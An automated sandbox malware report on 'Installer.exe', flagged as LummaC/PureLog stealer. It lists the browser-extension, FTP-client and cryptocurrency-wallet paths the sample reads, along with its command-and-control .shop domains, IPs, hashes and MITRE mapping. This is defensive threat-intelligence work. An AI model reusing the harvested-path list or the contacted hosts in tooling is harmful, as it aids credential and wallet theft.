Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\Installer.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: Installer.exe PID: 7480, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: Installer.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Installer.exe.7a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Installer.exe.3d69550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Installer.exe.3d69550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1653958308.00000000007A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2071607621.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	211 Process Injection	111 Deobfuscate/Decode Files or Information	LSASS Memory	22 System Information Discovery	Remote Desktop Protocol	31 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Screen Capture	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Software Packing	NTDS	231 Security Software Discovery	Distributed Component Object Model	3 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	23 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	23 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	211 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Installer.exe	29%	ReversingLabs	Win32.Exploit.PureLogStealer
Installer.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
https://fancywaxxers.shop/apih	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/e	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
fancywaxxers.shop	104.21.32.1	true	false		high

Contacted URLs

Name	Malicious	Reputation
cloudewahsj.shop	false	high
noisycuttej.shop	false	high
nearycrepso.shop	false	high
https://fancywaxxers.shop/api	false	high
rabidcowse.shop	false	high
wholersorie.shop	false	high
fancywaxxers.shop	false	high
framekgirus.shop	false	high
tirepublicerj.shop	false	high
abruptyopsn.shop	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://fancywaxxers.shop/e	Installer.exe, 00000002.00000002.2897953740.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://fancywaxxers.shop/apih	Installer.exe, 00000002.00000002.2897953740.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://upx.sf.net	Amcache.hve.5.dr	false		high
https://fancywaxxers.shop/	Installer.exe, 00000002.00000002.2898331175.00000000034A6000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000002.00000002.2897864942.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.32.1	fancywaxxers.shop	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584539
Start date and time:	2025-01-05 19:40:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Installer.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/5@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 28 Number of non-executed functions: 52
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29, 40.126.32.138, 52.149.20.212, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Installer.exe

Simulations

Behavior and APIs

Time	Type	Description
13:40:58	API Interceptor	8x Sleep call for process: Installer.exe modified
13:41:38	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.32.1	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	redroomaudio.com/administrator/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fancywaxxers.shop	Aura.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.80.1
	Script.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.80.1
	same.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWorm	Browse	104.21.112.1
	nayfObR.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	UhsjR3ZFTD.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	Solara-Roblox-Executor-v3.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	Delta.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	SMmAznmdAa.exe	Get hash	malicious	LummaC	Browse	104.21.48.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Insomia.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Aura.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.80.1
	loader.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	188.114.97.3
	LinxOptimizer.exe	Get hash	malicious	Unknown	Browse	172.67.75.163
	Script.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.80.1
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	Set-up.exe	Get hash	malicious	LummaC	Browse	172.67.208.58
	Set-up.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	'Set-up.exe	Get hash	malicious	LummaC	Browse	172.67.178.174
	setup.exe	Get hash	malicious	LummaC	Browse	172.67.163.221

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Insomia.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	Aura.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.32.1
	loader.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.32.1
	Script.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.32.1
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	Set-up.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	Set-up.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1
	'Set-up.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	setup.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	'Set-up.exe	Get hash	malicious	LummaC	Browse	104.21.32.1

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Installer.exe_61f0d4476017257c8adec5146cd9cfc793936bf_754596bf_efc50b0d-12ec-41bf-acb3-e7992197b463\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8858192282900352
Encrypted:	false
SSDEEP:	192:r8/dNTAoMCA0LR3kaGGzuiFc+Z24IO8XqA:gnDMCbLR3kaHzuiFc+Y4IO8Xq
MD5:	61A5B84F8DC70D26B9CF65C95A396462
SHA1:	184822BAEAF27CAB3A4BD5DB1EACD0662F3C986D
SHA-256:	3A63EE6799E4575D8E7D3EE6EF05593007F4E463B0C8B959DC2D12CE6C4DF95C
SHA-512:	A79A2FDBA150EE8A3B27CB38BE6DCCEE3C60D52DCCF8AA46A8A49C3BF233F5A7F2FECD44A31267555110BA1669A5711CD2A1EFF8444C57AEDAC2C2D306EBCEAE
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.5.7.6.0.5.8.0.2.4.1.4.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.5.7.6.0.5.8.5.5.5.4.0.0.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.f.c.5.0.b.0.d.-.1.2.e.c.-.4.1.b.f.-.a.c.b.3.-.e.7.9.9.2.1.9.7.b.4.6.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.b.f.1.2.5.7.6.-.3.8.9.2.-.4.4.c.4.-.9.3.b.9.-.0.8.d.2.8.e.a.d.f.4.4.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.I.n.s.t.a.l.l.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.f.4.-.0.0.0.1.-.0.0.1.4.-.7.1.6.3.-.e.2.5.b.a.1.5.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.d.8.9.b.e.5.0.3.d.2.d.5.1.5.d.0.1.9.8.e.3.c.2.c.c.8.2.d.1.d.4.0.0.0.0.f.f.f.f.!.0.0.0.0.d.5.c.f.6.c.d.9.e.a.e.1.1.d.c.0.3.2.3.d.0.5.6.0.4.b.2.6.5.c.e.2.7.0.7.4.6.a.e.8.!.I.n.s.t.a.l.l.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.6.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD47F.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sun Jan 5 18:40:58 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	152987
Entropy (8bit):	3.762911781734369
Encrypted:	false
SSDEEP:	1536:NVvGps1zuBojRypN4uE2aOyLTgCodIAPvDLCD3tT791ZcQVhJ97q1:nvGiHU4uEqyLTgRddedf9/cQF97q
MD5:	A0CAD432F94CF924FCFAE129E2554404
SHA1:	D1D85D618A70ABCEF4F011479E27D52A759BF39C
SHA-256:	806D332EBF60E81D4C093142CD8F17CA7B8D3302CE9A93BAA4670CF50A2F17A0
SHA-512:	3926EC54CCE81BD0944FD715E8F6B8FF46790244A767BF03BDB92F9285298E229EA70756D75E69F7930A9BCB9CA489FC52BFA582F36C0FF9AA978992D202039F
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......:.zg....................................$...........d..../..........`.......8...........T............$...1......................................................................................................eJ......P.......GenuineIntel............T...........9.zg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD58A.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8374
Entropy (8bit):	3.6886228982472855
Encrypted:	false
SSDEEP:	192:R6l7wVeJnj6E6Y9VSUegmfgVJgprp89brXsfb5m:R6lXJj6E6Y/SUegmfgVJjrcfo
MD5:	AF3D213A52B0CE9C0B55C9774BBA0E9E
SHA1:	F7173790A09B6275919D70FCECB00E4C0B8DC747
SHA-256:	0A8F122AF583781543185462966C4F935667F9240D9E60ED82DBC4ED11EEF79B
SHA-512:	4D3C0AF703B67ECB783BCE8046B34F3E5AD3A629896A0D13B703C55D9ADFD7C376A7A1501527A812948667265376722181B281E909FF5FA1BAB587700BFCF365
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.1.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD5CA.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4687
Entropy (8bit):	4.437022783226741
Encrypted:	false
SSDEEP:	48:cvIwWl8zs6Jg77aI9pWWpW8VYOYm8M4JgZjdxPcf6Fsj+q8vnjdxPcfjwTtSn2S/:uIjfII7X37VOJtfLKcfjwTonZLdd
MD5:	B3F518FF70A8398067E35BC5D5C687A1
SHA1:	0B6C2452B48018550601242BAE5668CDFA166DFB
SHA-256:	DB6132F7B8BBD06C546D140F8585FF11C9E505577DBA04FC002118946F959CF5
SHA-512:	2806E30E15051E0BB2D3B06ECE2CD46F7460B3891BC3AFB11100A2F78A29943E67EBA73C7771DE03821ACE40774CA9817CF44412FF9AF3DBA663BD12EE698417
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="662983" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.4655107045655065
Encrypted:	false
SSDEEP:	6144:IIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNidwBCswSbt:dXD94+WlLZMM6YFHI+t
MD5:	028F7177B81C46B917BF5517D6BCDC1B
SHA1:	63AEDEBDF5EA3B30613089FB0E8D198B0B6B2693
SHA-256:	B21500241190E39713BDCADD96C2AEABDA85043F0A4346AA83EDBF65ED3B0E7E
SHA-512:	8486AB5F9D6FD9530DDA90D2C531AB2F5BAED5077D8753E007935EE9A3615EC7B15B37659666836EA7121F7B459105D23EBAC287F1D538327EBF9A9D32263A39
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.a2\._................................................................................................................................................................................................................................................................................................................................................%h........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.933939205964555
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Installer.exe
File size:	370'176 bytes
MD5:	d6c51af8146503eebc3a023123936d29
SHA1:	d5cf6cd9eae11dc0323d05604b265ce270746ae8
SHA256:	739cf0a20292e03993ee29ea156dbcc281e7316a319d5dbbf8a7b0895aed09bb
SHA512:	673b019b51e5b76c9f2d8692b3cdc1bc1257ee9372f66febe0aadad50f432452316f2547e89a650a4cea31af1006cde27b470d04c2c547edebc96cc619864d66
SSDEEP:	6144:39Yyo0Z69k9/jaTn6zX+zvsWd5okfthPaYwB/S3x7kH1hvGLZd7eGsYal8dJGQhE:NJo0ZKWjIn6z+zvvd5Pthq/W7+1pGLZc
TLSH:	0B7412AE6287D12AD16D853214E3C84342B45B48BC47FB9A3F4D720AEF727AF1793641
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C,...............0.................. ........@.. ....................... ......F~....`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x40a4be
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xB22C430A [Sun Sep 21 17:53:14 2064 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
